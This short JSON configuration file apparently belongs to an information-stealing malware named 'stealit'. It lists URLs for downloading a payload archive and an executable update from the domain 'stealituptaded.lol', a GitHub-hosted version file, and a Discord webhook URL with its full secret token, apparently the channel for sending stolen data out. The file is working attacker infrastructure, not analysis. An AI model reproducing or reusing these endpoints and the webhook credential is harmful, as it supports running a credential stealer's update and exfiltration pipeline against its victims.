{
  "ZipUrl": "https://android.stealituptaded.lol/stealit_update.zip",
  "DiscordWebhookUrl": "https://discord.com/api/webhooks/1401568665572216952/znpoOd6uuDVqK_4Jv5ntUXDmrgUtB2lgwxeVfs2IHb2QkeSkyzWuPHbNtnRtMHDUNFIw",
  "versionUrl": "https://raw.githubusercontent.com/stlItApZ/8674zasQ856/refs/heads/main/version.json",
  "exeUpdateUrl": "https://android.stealituptaded.lol/Debug.zip" 
}
